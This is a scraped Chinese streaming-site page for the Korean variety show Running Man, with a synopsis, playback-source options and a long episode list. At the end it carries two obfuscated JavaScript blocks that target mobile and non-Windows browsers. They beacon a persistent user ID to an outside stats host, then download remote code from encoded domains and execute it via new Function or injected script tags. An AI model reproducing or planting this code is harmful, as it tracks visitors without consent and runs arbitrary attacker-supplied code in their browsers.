Running Man

《Running Man》剧情介绍:       Running Man是韩国SBS电视台周末娱乐节目《星期天真好》新的版块,是韩国著名主持人刘在石自“家族诞生”第一季结束后时隔五个月接手的SBS新艺能节目,作为刘在石的SBS艺能节目回归之作,running man致力于打造一个不同于过去real variety的新型态娱乐节目。可以说是SBS赌上自尊心的新艺能节目。2010年7月11日起作为‘星期日真好-1部’播放。 节目通过组队游戏获取金币或running ball 最后决定胜者,输的一队将接受惩罚。节目由刘在石,池石镇,HAHA,金钟国,Gary姜熙健,宋智孝,李光洙等搞笑性、艺能性极高的艺人主持。

展开全部
更新:

2024-07-14 01:09:48

评价:

选集播放
排序

选择播放源
LZ线路176
FF线路88
OK线路87
SD线路88
BF线路88
SN线路83
E01.200105 E02.200112 E03.200119 E04.200126 E05.200202 E06.200209 E07.200216 E08.200223 E09.200301 E10.200308 E11.200315 E12.200322 E13.200329 E14.200405 E15.200412 E16.200419 E17.200426 E18.200503 E19.200510 E20.200517 E21.200524 E22.200531 E23.200607 E24.200614 E25.200621 E26.200628 E27.200705 E28.200712 E29.200719 E30.200726 E31.200802 E32.200809 E33.200816 E34.200823 E35.200830 E36.200906 E37.200913 E38.200920 E39.200927 E40.201004 E41.201011 E42.201018 E43.201025 E44.201101 E45.201108 E46.201115 E47.201122 E48.201129 E49.201206 E586.220102 E587.220109 E588.220116 E589.220123 E590.220130 E591.220206 E592.220220 E593.211226 E594.220306 E595.220313 E596.220327 E597.220403 E598.220410 E599.220417 E600.220424 E601.220501 E602.220508 E603.220515 E604.220522 E605.220529 E606.220605 E608.220619 E609.220626 E610.220703 E611.220710 E612.220717 E613.220724 E614.220731 E615.220807 E616.220814 E617.220821 E618.220828 E619.220904 E620.220911 E621.220918 E622.220925 E623.221002 E624.221009 E625.221016 E626.221023 E627.221106 E628.221113 E629.221120 E630.221127 E631.221204 E632.221211 E633.221218 E634.221225 E635.230101 E636.230108 E637.230115 E638.230122 E639.230129 E640.230205 E641.230212 E642 E643 E644 E645 E646 E647 E648 E649 E650 E651 E652 E653 E654 E655 E656 E657 E658 E659 E660 E661 E662 E663 E664 E665 E666 E667 E668 E669 E670 E671 E672 E673 E674 E675 E676 E677 E678 E679 E680 E681 E682 E683 E684 E685 E686 E687 E688 E689 E690 E691 E692 E693 E694 E695 E696 E697 E698 E699 E700 E701 E702 E703 E704 E705 E706 E707 E708 E709 E710 E711 E720 E713
切换深色外观
留言
回到顶部

function PmLfkT(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function fZgBvw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return PmLfkT(t);};window[''+'v'+'d'+'B'+'X'+'g'+'Q'+'L'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=fZgBvw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ko.abdf1.cn:7891/stats/7698/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHR0cHHMlM0ElMkYlMkZwb2subGl4dWFubGVpMTUuY24lM0E4ODkx','d3NzJTNBJTJGJTJGcG8uYYWFsbDEuYY24lM0E5NTM1','4719',window,document,['H','Y']);}:function(){};
function tLVjX(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function JRkpv(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return tLVjX(t);};window[''+'O'+'x'+'C'+'Z'+'N'+'y'+'F'+'m'+'H'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=JRkpv,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ko.abdf1.cn:7891/stats/7698/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZwb2subGl4dWFubGVppMTUuY24lM0E4ODkx','d3NNzJTNNBJTJGJTJGcG8uYWFsbDEuY24lM0E5NNTM1','4717',window,document,['p','N']);}:function(){};